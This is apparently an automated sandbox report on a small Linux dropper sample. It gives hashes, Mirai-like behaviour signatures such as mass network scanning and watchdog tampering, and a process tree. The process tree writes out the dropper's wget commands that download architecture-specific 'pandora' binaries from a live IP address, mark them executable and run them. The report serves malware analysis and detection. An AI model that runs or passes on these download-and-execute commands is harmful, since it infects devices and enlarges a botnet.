Analysis
-
max time kernel
13926s -
max time network
152s -
platform
linux_mipsel -
resource
debian9-mipsel-en-20211208 -
submitted
18-05-2022 21:23
Static task
static1
Behavioral task
behavioral1
Sample
e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f
Resource
ubuntu1804-amd64-en-20211208
Behavioral task
behavioral2
Sample
e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f
Resource
debian9-armhf-en-20211208
Behavioral task
behavioral3
Sample
e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f
Resource
debian9-mipsbe-en-20211208
Behavioral task
behavioral4
Sample
e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f
Resource
debian9-mipsel-en-20211208
General
-
Target
e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f
-
Size
2KB
-
MD5
c7866a6bf93fe47bb819d8f5d379e353
-
SHA1
757fb6c3a1aa19e129b3ea3fef1da5bcfe70e55c
-
SHA256
e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f
-
SHA512
370ee08829af83c795191036f041e89949d1b03eb3b35452c17dc08555ca5633a1c0262ff2f4aaa730036973c510642dd3d0476b7bdad0d8839cd05087a10733
Malware Config
Signatures
-
Contacts a large (136179) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Modifies the Watchdog daemon 1 TTPs
Malware like Mirai modify the Watchdog to prevent it restarting an infected system.
-
Writes file to system bin folder 1 TTPs 1 IoCs
-
Enumerates active TCP sockets 1 TTPs 1 IoCs
Gets active TCP sockets from /proc virtual filesystem.
-
Write file to user bin folder 1 TTPs 1 IoCs
-
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
Processes:
description ioc /proc/359/fd /proc/359/fd /proc/395/fd /proc/395/fd /proc/437/exe /proc/437/exe /proc/459/exe /proc/459/exe /proc/138/fd /proc/138/fd /proc/282/fd /proc/282/fd /proc/349/fd /proc/349/fd /proc/434/exe /proc/434/exe /proc/419/fd /proc/419/fd /proc/428/fd /proc/428/fd /proc/433/exe /proc/433/exe /proc/322/fd /proc/322/fd /proc/323/fd /proc/323/fd /proc/393/fd /proc/393/fd /proc/399/fd /proc/399/fd /proc/384/fd /proc/384/fd /proc/455/exe /proc/455/exe /proc/295/fd /proc/295/fd /proc/351/fd /proc/351/fd /proc/371/fd /proc/371/fd /proc/374/fd /proc/374/fd /proc/1/fd /proc/1/fd /proc/426/fd /proc/426/fd /proc/435/exe /proc/435/exe /proc/294/fd /proc/294/fd /proc/377/fd /proc/377/fd /proc/408/fd /proc/408/fd /proc/410/fd /proc/410/fd /proc/396/fd /proc/396/fd /proc/460/exe /proc/460/exe /proc/156/fd /proc/156/fd /proc/385/fd /proc/385/fd /proc/426/exe /proc/426/exe /proc/344/fd /proc/344/fd /proc/362/fd /proc/362/fd /proc/363/fd /proc/363/fd /proc/429/fd /proc/429/fd /proc/227/fd /proc/227/fd /proc/357/fd /proc/357/fd /proc/364/fd /proc/364/fd /proc/406/fd /proc/406/fd /proc/429/exe /proc/429/exe /proc/204/fd /proc/204/fd /proc/215/fd /proc/215/fd /proc/251/fd /proc/251/fd /proc/279/fd /proc/279/fd /proc/346/fd /proc/346/fd /proc/417/fd /proc/417/fd /proc/421/fd /proc/421/fd /proc/244/fd /proc/244/fd /proc/375/fd /proc/375/fd /proc/387/fd /proc/387/fd /proc/404/fd /proc/404/fd /proc/407/fd /proc/407/fd /proc/246/fd /proc/246/fd /proc/276/fd /proc/276/fd /proc/360/fd /proc/360/fd /proc/366/fd /proc/366/fd /proc/350/fd /proc/350/fd /proc/382/fd /proc/382/fd /proc/388/fd /proc/388/fd /proc/415/fd /proc/415/fd /proc/365/fd /proc/365/fd /proc/373/fd /proc/373/fd
Processes
-
./e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f./e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f1⤵PID:322
-
/usr/bin/wgetwget http://107.174.176.165/Pandoras_Box/pandora.x862⤵PID:324
-
/bin/catcat pandora.x862⤵PID:329
-
/bin/chmodchmod +x awoo e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f pandora.x86 systemd-private-0d3573f58ef74f22a1fe929693d129ab-systemd-timesyncd.service-8gSy6k2⤵PID:330
-
./awoo./awoo2⤵PID:331
-
/usr/bin/wgetwget http://107.174.176.165/Pandoras_Box/pandora.mips2⤵PID:333
-
/bin/catcat pandora.mips2⤵PID:335
-
/bin/chmodchmod +x awoo e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f pandora.mips pandora.x86 systemd-private-0d3573f58ef74f22a1fe929693d129ab-systemd-timesyncd.service-8gSy6k2⤵PID:336
-
./awoo./awoo2⤵PID:337
-
/usr/bin/wgetwget http://107.174.176.165/Pandoras_Box/pandora.mpsl2⤵PID:339
-
/bin/catcat pandora.mpsl2⤵PID:341
-
/bin/chmodchmod +x awoo e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f pandora.mips pandora.mpsl pandora.x86 systemd-private-0d3573f58ef74f22a1fe929693d129ab-systemd-timesyncd.service-8gSy6k2⤵PID:342
-
./awoo./awoo2⤵PID:343
-
/usr/bin/wgetwget http://107.174.176.165/Pandoras_Box/pandora.arm42⤵PID:350
-
/bin/chmodchmod +x awoo e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f pandora.mips pandora.mpsl pandora.x86 systemd-private-0d3573f58ef74f22a1fe929693d129ab-systemd-timesyncd.service-8gSy6k2⤵PID:355
-
./awoo./awoo2⤵PID:356
-
/usr/bin/wgetwget http://107.174.176.165/Pandoras_Box/pandora.arm52⤵PID:363
-
/bin/chmodchmod +x awoo e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f pandora.arm5 pandora.mips pandora.mpsl pandora.x86 systemd-private-0d3573f58ef74f22a1fe929693d129ab-systemd-timesyncd.service-8gSy6k2⤵PID:369
-
./awoo./awoo2⤵PID:370
-
/usr/bin/wgetwget http://107.174.176.165/Pandoras_Box/pandora.arm62⤵PID:374
-
/bin/chmodchmod +x awoo e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f pandora.arm5 pandora.arm6 pandora.mips pandora.mpsl pandora.x86 systemd-private-0d3573f58ef74f22a1fe929693d129ab-systemd-timesyncd.service-8gSy6k2⤵PID:380
-
./awoo./awoo2⤵PID:381
-
/usr/bin/wgetwget http://107.174.176.165/Pandoras_Box/pandora.arm72⤵PID:388
-
/bin/chmodchmod +x awoo e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f pandora.arm5 pandora.arm6 pandora.arm7 pandora.mips pandora.mpsl pandora.x86 systemd-private-0d3573f58ef74f22a1fe929693d129ab-systemd-timesyncd.service-8gSy6k2⤵PID:391
-
./awoo./awoo2⤵PID:392
-
/usr/bin/wgetwget http://107.174.176.165/Pandoras_Box/pandora.ppc2⤵PID:397
-
/bin/chmodchmod +x awoo e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f pandora.arm5 pandora.arm6 pandora.arm7 pandora.mips pandora.mpsl pandora.ppc pandora.x86 systemd-private-0d3573f58ef74f22a1fe929693d129ab-systemd-timesyncd.service-8gSy6k2⤵PID:402
-
./awoo./awoo2⤵PID:403
-
/usr/bin/wgetwget http://107.174.176.165/Pandoras_Box/pandora.m68k2⤵PID:407
-
/bin/chmodchmod +x awoo e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f pandora.arm5 pandora.arm6 pandora.arm7 pandora.m68k pandora.mips pandora.mpsl pandora.ppc pandora.x86 systemd-private-0d3573f58ef74f22a1fe929693d129ab-systemd-timesyncd.service-8gSy6k2⤵PID:413
-
./awoo./awoo2⤵PID:414
-
/usr/bin/wgetwget http://107.174.176.165/Pandoras_Box/pandora.sh42⤵PID:418
-
/bin/chmodchmod +x awoo e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f pandora.arm5 pandora.arm6 pandora.arm7 pandora.m68k pandora.mips pandora.mpsl pandora.ppc pandora.sh4 pandora.x86 systemd-private-0d3573f58ef74f22a1fe929693d129ab-systemd-timesyncd.service-8gSy6k2⤵PID:424
-
./awoo./awoo2⤵PID:425